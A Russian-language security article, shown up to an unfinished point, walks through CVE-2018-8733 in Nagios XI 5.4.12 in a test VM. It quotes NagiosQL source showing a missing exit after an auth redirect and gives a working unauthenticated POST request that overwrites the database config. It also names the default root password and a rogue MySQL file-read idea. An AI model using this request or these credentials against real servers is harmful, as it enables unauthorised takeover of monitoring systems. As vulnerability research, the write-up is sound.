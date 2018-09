Nagios — это одно из популярнейших решений для мониторинга, которое используется во многих крупных компаниях. Обнаруженные в нем уязвимости приводят к полной компрометации системы и выполнению произвольного кода с правами суперпользователя, а для их эксплуатации не нужно обладать никакими привилегиями. Давай разберемся, какие ошибки допустили разработчики и как этим можно воспользоваться.

Nagios решает довольно типичный для своего класса программ набор задач: контроль состояния компьютерных систем и сетей, наблюдение за выполняющимися службами и демонами и тому подобные задачи. Также в Nagios входит расширенная система оповещения админа об изменениях в функционировании системы, например когда какие-то из компонентов прекращают свою работу.

Проблемы были обнаружены исследователями Redacted Security и затрагивают все версии продукта вплоть до Nagios XI версии 5.4.12.

Приготовления

Для демонстрации уязвимости я подниму тестовое окружение. Nagios XI можно вполне легально скачать с официального сайта абсолютно бесплатно. После установки он спокойно проработает в пробном режиме в течение 60 дней. Нам этого вполне достаточно.

Решение поставляется в нескольких вариантах: в виде пакета для дистрибутивов Linux, в виде образа VHD для Windows с поддержкой аппаратной виртуализации на основе гипервизора (Hyper-V) и в формате OVF (Open Virtualization Format), который поддерживается всеми приличными приложениями для виртуализации. Мне удобнее использовать именно последний вариант.

Все манипуляции я буду проводить на последней уязвимой версии системы — 5.4.12, поэтому сначала скачаем ее образ. После этого нужно развернуть его на виртуальной машине. Для этой цели подойдут как коммерческие продукты VMware, так и бесплатные решения типа VirtualBox или того же VMware Player.

Когда импорт завершится, запустим новоиспеченную виртуалку, после непродолжительной загрузки видим приглашение авторизации в систему, IP-адрес машины и пароль рута. По дефолту это nagiosxi .

Теперь, как и советует система, нужно перейти в браузере по указанному IP-адресу и выполнить начальную настройку.

После нажатия на кнопку Install система будет готова к экспериментам.

Начало пути. Обход авторизации. CVE-2018-8733

В состав Nagios входит NagiosQL — это веб-интерфейс для конфигурирования системы. По дефолту он располагается по адресу /nagiosql/ . Авторизоваться можно, используя ту же связку логин-пароль, которую мы указывали на этапе начальной настройки.

В разделе Administration есть подраздел Settings , где можно настроить сам NagiosQL . Среди переменных здесь есть раздел Database , в котором находятся параметры подключения к базе данных.

Они записываются в конфигурационный файл settings.php. По умолчанию он выглядит примерно так.

/var/www/html/nagiosql/config/settings.php

01: <?php 02: exit; 03: ?> ... 20: [db] 21: server = localhost 22: port = 3306 23: database = nagiosql 24: username = nagiosql 25: password = n@gweb 26: [common] 27: install = passed

Разумеется, все перечисленные возможности доступны только для авторизованного админа. Или нет? Заглянем в исходник скрипта, который отвечает за изменения конфига, а именно в его начало.

/var/www/html/nagiosql/admin/settings.php

23: $intMain = 7; 24: $intSub = 29; 25: $intMenu = 2; 26: $preContent = "admin/settings.tpl.htm"; 27: $strMessage = ""; 28: $intError = 0; 29: // 30: // Include requirements 31: // ====================== 32: $preAccess = 1; 33: $preFieldvars = 1; 34: // Import basic function 35: require("../functions/prepend_adm.php"); 36: // Import translation function 37: require("../functions/translator.php");

На 35-й строке подгружается файл prepend_adm.php, который в том числе выполняет ряд проверок авторизации.

/var/www/html/nagiosql/functions/prepend_adm.php

164: if (($_SESSION['username'] != "") && (!isset($preNoLogCheck) || ($preNoLogCheck == 0))) { ... 182: if ($intResult != 0) { 183: $myDataClass->writeLog(_('Restricted site accessed:')." ".$_SERVER['PHP_SELF']); 184: header("Location: ".$SETS['path']['protocol']."://".$_SERVER['HTTP_HOST'].$SETS['path']['root']."admin/errorsite.php"); // todo check 185: } ... 190: } else { 191: // Neues Login erzwingen 192: $myDataClass->writeLog(_('User not found in database')); 193: header("Location: ".$SETS['path']['protocol']."://".$_SERVER['HTTP_HOST'].$SETS['path']['root']."index.php"); ... 195: } else if (!isset($preNoLogin)) { 196: // Neues Login erzwingen 197: header("Location: ".$SETS['path']['protocol']."://".$_SERVER['HTTP_HOST'].$SETS['path']['root']."index.php");

Чего-то не хватает, не правда ли? А именно завершения работы скрипта после редиректа. Благодаря такой неосторожности разработчиков выполнение кода продолжится, даже если пользователь не авторизован, и мы можем вносить изменения в конфигурационный файл.

/var/www/html/nagiosql/admin/settings.php

043: $selLanguage = isset($_POST['selLanguage']) ? $_POST['selLanguage'] : $SETS['data']['locale']; ... 045: $txtDBserver = isset($_POST['txtDBserver']) ? $_POST['txtDBserver'] : $SETS['db']['server']; 046: $txtDBport = isset($_POST['txtDBport']) ? $_POST['txtDBport'] : $SETS['db']['port']; 047: $txtDBname = isset($_POST['txtDBname']) ? $_POST['txtDBname'] : $SETS['db']['database']; 048: $txtDBuser = isset($_POST['txtDBuser']) ? $_POST['txtDBuser'] : $SETS['db']['username']; 049: $txtDBpass = isset($_POST['txtDBpass']) ? $_POST['txtDBpass'] : $SETS['db']['password']; ... 063: if ( (isset($_POST)) AND (isset($_POST['selLanguage']))) { ... 085: $filSet = fopen($txtBasePath."config/settings.php","w"); 086: if ($filSet) { 087: fwrite($filSet,"<?php

"); 088: fwrite($filSet,"exit;

"); 089: fwrite($filSet,"?>

"); ... 107: fwrite($filSet,"server = ".$txtDBserver."

"); 108: fwrite($filSet,"port = ".$txtDBport."

"); 109: fwrite($filSet,"database = ".$txtDBname."

"); 110: fwrite($filSet,"username = ".$txtDBuser."

"); 111: fwrite($filSet,"password = ".$txtDBpass."

"); ... 114: fclose($filSet);

Все, что требуется, — это передать локаль и нужные переменные в соответствующих параметрах POST-запроса. Он будет выглядеть следующим образом:

POST /nagiosql/admin/settings.php HTTP/1.1 Host: nagios.vh Content-Type: application/x-www-form-urlencoded Connection: close selLanguage=en_GB&txtDBserver=localhost&txtDBuser=nagiosql&txtDBpass=n@gweb

Хоть сервер и вернул код 302, но скрипт продолжил свое выполнение и перезаписал конфиг.

Тут уже открывается некий простор для творчества. Можно указать в качестве адреса базы данных свой сервак с Rogue MySQL Server и получить читалку файлов. Также изменение некоторых параметров дает возможность вызвать отказ в обслуживании. Но это не особенно интересно. Гораздо полезнее поменять юзера, под которым происходит соединение с базой данных. Это поможет нам продвинуться к нашей цели — полной компрометации системы. Благо по умолчанию пароль пользователя root устанавливается в nagiosxi не только для входа в систему, но и для авторизации в БД.